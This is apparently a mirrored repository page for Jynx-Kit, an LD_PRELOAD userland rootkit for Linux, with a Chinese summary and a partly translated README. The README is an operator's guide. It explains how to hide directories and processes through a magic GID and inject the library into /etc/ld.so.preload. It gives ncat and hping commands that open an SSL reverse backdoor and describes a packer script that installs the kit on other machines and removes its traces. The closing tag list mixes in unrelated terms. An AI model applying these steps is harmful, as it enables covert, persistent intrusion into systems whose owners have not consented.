chokepoint/jynxkit

GitHub: chokepoint/jynxkit

基于 LD_PRELOAD 技术的 Linux 用户态 Rootkit,具备文件进程隐藏和 SSL 加密反向后门功能。

Stars: 60 | Forks: 32

``` _ _,.-.' .-. _ .' |,' ."".| |.""._ ( || ,',"". `._`' ` ' `. `\ | `" .-"`-..` . `. | `..--.._ | \ _,| _...'_.' ,+. `. ,""'| `...-'..""(__.._ -" `"--.. `. |`._,' ,' /\ .'""` .'""`. `. | `. \ ' / / / || || |.`.`. . | \ `.__,'-._' /|` -"' `-.' \ \ \ `"-' \ ' `. / /_| | |'""| | .-""'`'"`-,.-"\ . . / .\ . / | | `._.' || ,' \ \ ' / / |/ /_.-+._`-..--"-. . . \ ` ``` / /.' ' ,'""'-. `"."'""'`.. |. \ \ / . | j . . | |\__," |. ` ' \ . | | | | ' | '| | ' ` \ \ . | | | `.____,' ..____,' | | . \ | | | | ._ _..---._ _,' | . ' | | | | | "" . |`"' \ `.| ' ' ' . | | | | | | | ` ` . . \ | | | | | | ' | \ `. | | . | ' ' | | | . ` \ \ | | | | \ ` | | | . `. | | | | \ \ ' | ` ' ` `+..|___|___|_........ \ \ \| ' . `. `. | `. \ . . ` `. `-. .' _,'`. \' . \ `-.._ `._ ,' _." `._ `.` | . `._ . `._ _,`"--`. | . `. | `-._ ,' | `. `|_ ,' | | `. `. .' __...__.| | \ __..._ _,..,.__ `. `-`"' `._..--'-.__ .' `-..' ``'"--..-' `"---' ``` /$$$$$ /$$ /$$ /$$ /$$ ``` |__ $$ | $$ /$$/|__/ | $$ | $$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ /$$/ /$$ /$$$$$$ | $$| $$ | $$| $$__ $$| $$ /$$//$$$$$$| $$$$$/ | $$|_ $$_/ /$$ | $$| $$ | $$| $$ \ $$ \ $$$$/|______/| $$ $$ | $$ | $$ | $$ | $$| $$ | $$| $$ | $$ >$$ $$ | $$\ $$ | $$ | $$ /$$ | $$$$$$/| $$$$$$$| $$ | $$ /$$/\ $$ | $$ \ $$| $$ | $$$$/ \______/ \____ $$|__/ |__/|__/ \__/ |__/ \__/|__/ \___/ /$$ | $$ | $$$$$$/ \______/ ``` BlackHatAcademy.org ErrProne / XO ``` 文件列表:bc.c config.h ld_poison.so Makefile packer.sh README 0x01. 设置 config.h。 ``` First of all, you need to dig into config.h, and ensure that the settings meet your needs. ``` MAGIC_DIR 应更改为您希望对系统隐藏的目录名称。这也可以用作主目录的前缀以及文件的前缀。MAGIC_GID 将是用于隐藏的 Group ID。请确保您将 MAGIC_DIR 的 Group ID 设置为 MAGIC_GID 以便进行隐藏。这将有助于向系统隐藏进程,包括像 ps 这样的命令。CONFIG_FILE 默认为 ld.so.preload,通常位于 /etc 中。除非您打算更深入地隐藏 Jynx-Kit,否则不必更改此设置。MAGIC_ACK 和 MAGIC_SEQ 均用作反向连接的端口敲门序列。反向连接程序会自动将 GID 设置为 MAGIC_GID,因此无需担心此问题。您将使用像 hping 这样的程序发起反向连接,以根据需要操作数据包。 # ncat --ssl -l -p 31337 # 设置 ssl 监听器 # hping localhost -s 31337 -M -L -c 1 # 使反向连接回连 0x02. 配置 Makefile 和安装。 ``` Once you have this configured, go ahead and open up Makefile. Make sure that MAGIC_GID ``` 与您在 config.h 中的设置一致。INSTALL 应设置为要隐藏文件的目录。您也可以在调用“make install”时设置这些变量。请参阅下面的示例。 # make all # 编译 bc 和 ld_poison.so # make install # 安装 bc 和 ld_poison,注入到 ld preload,并设置正确的 GID # make install INSTALL=/omgxochi MAGIC_GID=100 ``` The last line installs the kid to /omgxochi, and sets the GID to 100. You should use GID ``` 对于您打算运行且需要向系统隐藏的任何内容,其 GID 均为 100。 0x03. packer.sh 现在您已完成所有配置并且编译正确,您可以使用 packer.sh 为将来的安装创建一个自动安装 shell 脚本。只需编辑 INSTALL_FILE 和 FILES 变量(如果您添加或删除了 Jynx-Kit 最初附带的任何文件)。默认情况下,packer.sh 会创建 install.sh,该脚本可在任何系统上运行,它会解压源文件,编译它们,将它们安装到定义的隐藏目录中,然后清理所有文件。
标签:Backdoor, CSV导出, Cutter, LD_PRELOAD, Reverse Shell, Rootkit, SSL, Userland Rootkit, Zeek, 内存劫持, 动态链接库劫持, 协议分析, 子域名枚举, 客户端加密, 客户端加密, 恶意软件, 权限提升, 私有化部署, 系统安全, 网络安全, 防御规避, 隐私保护, 隐蔽通信